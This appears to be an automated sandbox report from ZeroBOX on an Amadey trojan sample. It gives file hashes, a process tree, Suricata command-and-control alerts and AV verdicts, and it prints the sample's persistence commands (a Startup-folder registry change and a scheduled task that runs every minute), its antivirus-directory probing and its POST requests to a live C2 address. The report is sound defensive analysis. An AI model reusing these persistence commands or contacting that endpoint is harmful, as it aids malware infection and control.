Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	Oct. 26, 2021, 9:22 a.m.	Oct. 26, 2021, 9:25 a.m.

Size	398.0KB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`f6be182d94ecfa6172e27d254444e88f`
SHA256	`72691413d7d918f8064667bd71ac58a8e53244a137670353f66a727b5cc456d5`
CRC32	`C60212F2`
ssdeep	`6144:hMh/XLfepxkjkB/UUwoNQYzkQ2nGz7dwLcfeoZ3i222BKEKnkRv:uXLmpxkjkB/rN1zkQ2nGz7dWW0k`
Yara	Malicious_Packer_Zero - Malicious Packer PE_Header_Zero - PE File Signature IsPE32 - (no description)

1202120788.exe "C:\Users\test22\AppData\Local\Temp\1202120788.exe"
2292
- sqtvvs.exe "C:\Users\test22\AppData\Local\Temp\603c0340b4\sqtvvs.exe"
  2396
  - cmd.exe "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\test22\AppData\Local\Temp\603c0340b4\
    2548
    - reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\test22\AppData\Local\Temp\603c0340b4\
      2196
  - schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN sqtvvs.exe /TR "C:\Users\test22\AppData\Local\Temp\603c0340b4\sqtvvs.exe" /F
    200

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
185.215.113.45	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 185.215.113.45:80 -> 192.168.56.103:49170	2400024	ET DROP Spamhaus DROP Listed Traffic Inbound group 25	Misc Attack
TCP 192.168.56.103:49170 -> 185.215.113.45:80	2027700	ET MALWARE Amadey CnC Check-In	Malware Command and Control Activity Detected

Suricata TLS

No Suricata TLS

Queries for the computername (1 event)

Time & API	Arguments	Status	Return	Repeated
GetComputerNameW Oct. 26, 2021, 9:22 a.m.	computer_name: TEST22-PC	1	1	0

Command line console output was observed (2 events)

Time & API	Arguments	Status	Return	Repeated
WriteConsoleW Oct. 26, 2021, 9:22 a.m.	buffer: SUCCESS: The scheduled task "sqtvvs.exe" has successfully been created. console_handle: 0x00000007	1	1	0
WriteConsoleW Oct. 26, 2021, 9:22 a.m.	buffer: The operation completed successfully. console_handle: 0x00000007	1	1	0

HTTP traffic contains suspicious features which may be indicative of malware related traffic (2 events)

suspicious_features	POST method with no referer header, POST method with no useragent header, Connection to IP address				suspicious_request	POST http://185.215.113.45/g4MbvE/index.php
suspicious_features	POST method with no referer header, POST method with no useragent header, Connection to IP address				suspicious_request	POST http://185.215.113.45/g4MbvE/index.php?scr=1

Performs some HTTP requests (2 events)

request	POST http://185.215.113.45/g4MbvE/index.php
request	POST http://185.215.113.45/g4MbvE/index.php?scr=1

Sends data using the HTTP POST Method (2 events)

request	POST http://185.215.113.45/g4MbvE/index.php
request	POST http://185.215.113.45/g4MbvE/index.php?scr=1

Allocates read-write-execute memory (usually to unpack itself) (4 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Oct. 26, 2021, 9:22 a.m.	process_identifier: 2292 region_size: 360448 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00470000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 26, 2021, 9:22 a.m.	process_identifier: 2292 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 360448 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 26, 2021, 9:22 a.m.	process_identifier: 2396 region_size: 360448 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00470000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 26, 2021, 9:22 a.m.	process_identifier: 2396 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 360448 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 process_handle: 0xffffffff	1

Creates executable files on the filesystem (1 event)

file	C:\Users\test22\AppData\Local\Temp\603c0340b4\sqtvvs.exe

Creates a suspicious process (3 events)

cmdline	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN sqtvvs.exe /TR "C:\Users\test22\AppData\Local\Temp\603c0340b4\sqtvvs.exe" /F
cmdline	SCHTASKS /Create /SC MINUTE /MO 1 /TN sqtvvs.exe /TR "C:\Users\test22\AppData\Local\Temp\603c0340b4\sqtvvs.exe" /F
cmdline	"C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\test22\AppData\Local\Temp\603c0340b4\

Drops a binary and executes it (1 event)

file	C:\Users\test22\AppData\Local\Temp\603c0340b4\sqtvvs.exe

Drops an executable to the user AppData folder (1 event)

file	C:\Users\test22\AppData\Local\Temp\603c0340b4\sqtvvs.exe

A process created a hidden window (3 events)

Time & API	Arguments	Status	Return
ShellExecuteExW Oct. 26, 2021, 9:22 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\603c0340b4\sqtvvs.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\603c0340b4\sqtvvs.exe	1	1
ShellExecuteExW Oct. 26, 2021, 9:22 a.m.	show_type: 0 filepath_r: cmd parameters: /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\test22\AppData\Local\Temp\603c0340b4\ filepath: cmd	1	1
ShellExecuteExW Oct. 26, 2021, 9:22 a.m.	show_type: 0 filepath_r: SCHTASKS parameters: /Create /SC MINUTE /MO 1 /TN sqtvvs.exe /TR "C:\Users\test22\AppData\Local\Temp\603c0340b4\sqtvvs.exe" /F filepath: SCHTASKS	1	1

Uses Windows utilities for basic Windows functionality (5 events)

cmdline	cmd /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\test22\AppData\Local\Temp\603c0340b4\
cmdline	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN sqtvvs.exe /TR "C:\Users\test22\AppData\Local\Temp\603c0340b4\sqtvvs.exe" /F
cmdline	SCHTASKS /Create /SC MINUTE /MO 1 /TN sqtvvs.exe /TR "C:\Users\test22\AppData\Local\Temp\603c0340b4\sqtvvs.exe" /F
cmdline	"C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\test22\AppData\Local\Temp\603c0340b4\
cmdline	REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\test22\AppData\Local\Temp\603c0340b4\

Communicates with host for which no DNS query was performed (1 event)

host

185.215.113.45

Attempts to identify installed AV products by installation directory (7 events)

file	C:\ProgramData\AVAST Software
file	C:\ProgramData\Avira
file	C:\ProgramData\Kaspersky Lab
file	C:\ProgramData\Panda Security
file	C:\ProgramData\Bitdefender
file	C:\ProgramData\AVG
file	C:\ProgramData\Doctor Web

Installs itself for autorun at Windows startup (2 events)

cmdline	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN sqtvvs.exe /TR "C:\Users\test22\AppData\Local\Temp\603c0340b4\sqtvvs.exe" /F
cmdline	SCHTASKS /Create /SC MINUTE /MO 1 /TN sqtvvs.exe /TR "C:\Users\test22\AppData\Local\Temp\603c0340b4\sqtvvs.exe" /F

File has been identified by 25 AntiVirus engines on VirusTotal as malicious (25 events)

Elastic	malicious (high confidence)
FireEye	Generic.mg.f6be182d94ecfa61
McAfee	RDN/Generic.rp
Cylance	Unsafe
Sangfor	Suspicious.Win32.Save.a
CrowdStrike	win/malicious_confidence_90% (W)
BitDefenderTheta	Gen:NN.ZexaF.34236.yuW@aOfGKFci
Symantec	ML.Attribute.HighConfidence
ESET-NOD32	a variant of Win32/GenKryptik.FMOK
APEX	Malicious
Kaspersky	UDS:DangerousObject.Multi.Generic
NANO-Antivirus	Virus.Win32.Gen.ccmw
Avast	FileRepMetagen [Malware]
Rising	Trojan.Generic@ML.85 (RDML:qqNYuXiQ1ilL0QgB4fSmQw)
McAfee-GW-Edition	BehavesLike.Win32.Trojan.fm
Sophos	Mal/Generic-R + Mal/EncPk-APW
Ikarus	Trojan.Win32.Crypt
eGambit	Unsafe.AI_Score_89%
Microsoft	Trojan:Win32/Sabsik.FL.A!ml
Gridinsoft	Malware.Win32.Gen.bot!se28925
ZoneAlarm	UDS:DangerousObject.Multi.Generic
Cynet	Malicious (score: 100)
SentinelOne	Static AI - Malicious PE
AVG	FileRepMetagen [Malware]
Cybereason	malicious.88e923

1202120788.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All